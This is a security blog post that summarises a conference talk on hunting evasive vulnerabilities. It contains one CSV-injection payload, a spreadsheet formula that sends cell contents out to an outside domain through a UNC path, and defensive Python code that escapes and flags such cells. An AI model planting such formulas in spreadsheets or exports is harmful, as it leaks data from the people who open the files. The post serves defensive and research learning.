tl;dr: Hunting Evasive Vulnerabilities

Posted on May 23, 2022

Below are some takeaways from @albinowax’s brilliant presentation at Nullcon Berlin. He explores why some vulnerabilities are evasive and gives some ideas and advice on how to dig them out. You can find the keynote here.

Takeaways

  • Don’t let the appearance of defences deter you from trying the attack anyway. The defences may be misconfigured in a way that nobody understands yet.
  • Seek out old or unfashionable exploit techniques and learn about them from the original research. Often, more modern content is just a diluted version.
  • “That’ll never work…” -> “That’ll never work unless…” Define the ‘unless’ as precisely as possible and try it out.
  • “That’s too obvious…” = infosec version of the bystander effect. Try it anyway; you could be lucky and find that nobody else has tried it before.
  • App-specific knowledge is highly valuable. Mining a tonne of parameters is not useful if you don’t know how the app itself works.
  • Bug bounty assets are scanned by millions of people using default settings. Flip random switches to discover something different!
  • Curiosity-powered hacking: test hypotheses, ask questions and iterate. Make asking questions cheap. Build on your existing knowledge and assumptions, but be ready for them to be completely overturned.

And the CSV injection payload he shared:

"=INDIRECT(CONCAT(""'\\"",A1,"".psres.net\[f]1'!A1""))""
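The payload above works because spreadsheet applications evaluate any imported cell that starts with a formula trigger character. As an added example (not code from the talk or the original post), the following Python shows the export-side mitigation and an import-side detection check: cells beginning with `=`, `+`, `-`, `@`, tab or carriage return are prefixed with a single quote so they render as text, while plain numeric values such as `-5.00` are left alone so negative numbers are not corrupted. The sample rows and function names are constructed for this illustration.

```python
import csv
import io
import re

# Characters that make Excel, LibreOffice and Google Sheets treat a cell as a
# formula. Tab and carriage return are included because some importers strip
# leading whitespace before deciding whether a cell is a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Plain decimal numbers ("-5.00", "+1") start with a trigger character but are
# data, not formulas; escaping them would break numeric columns on import.
_PLAIN_NUMBER = re.compile(r"[+-]?\d+(\.\d+)?")


def looks_like_formula(value: str) -> bool:
    """Return True if a cell value would be parsed as a formula on import."""
    if not value.startswith(FORMULA_TRIGGERS):
        return False
    return _PLAIN_NUMBER.fullmatch(value) is None


def neutralise_cell(value) -> str:
    """Escape a single cell so a spreadsheet renders it as literal text.

    A leading single quote forces text mode. Embedded double quotes are
    handled by the csv writer, which doubles them inside the quoted field so
    the value cannot terminate the field early.
    """
    text = str(value)
    if looks_like_formula(text):
        text = "'" + text
    return text


def export_csv(rows) -> str:
    """Serialise rows to CSV with every cell neutralised and fully quoted."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralise_cell(c) for c in row])
    return buf.getvalue()


def flag_suspicious_cells(rows):
    """Import-side detection: list (row, col, value) for every cell that an
    importer would evaluate as a formula, e.g. to log or reject an upload."""
    return [
        (r, c, v)
        for r, row in enumerate(rows)
        for c, v in enumerate(row)
        if isinstance(v, str) and looks_like_formula(v)
    ]


# Constructed sample: user-controlled "name" values mixed with real numbers.
SAMPLE_ROWS = [
    ["id", "name", "balance"],
    ["1", "Alice", "10.00"],
    ["2", "=SUM(A1:A3)", "-5.00"],
    ["3", "@bob", "+1"],
]

if __name__ == "__main__":
    print(export_csv(SAMPLE_ROWS))
    print(flag_suspicious_cells(SAMPLE_ROWS))
```

Escaping on export is the control an application owner can actually enforce; the detection helper is useful when the application also consumes CSV, since a flagged cell in an upload is worth logging even if it is ultimately neutralised.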

Possible future project

A note I made to myself for a future project is to develop a tool that maps the popularity of vulnerabilities in the same way as the graphs shown at the 14:00 mark - it would be a decent resource for identifying vulnerabilities that have likely crept back into modern apps IMO. If you know of such a tool or would like to collaborate on developing it, get in touch!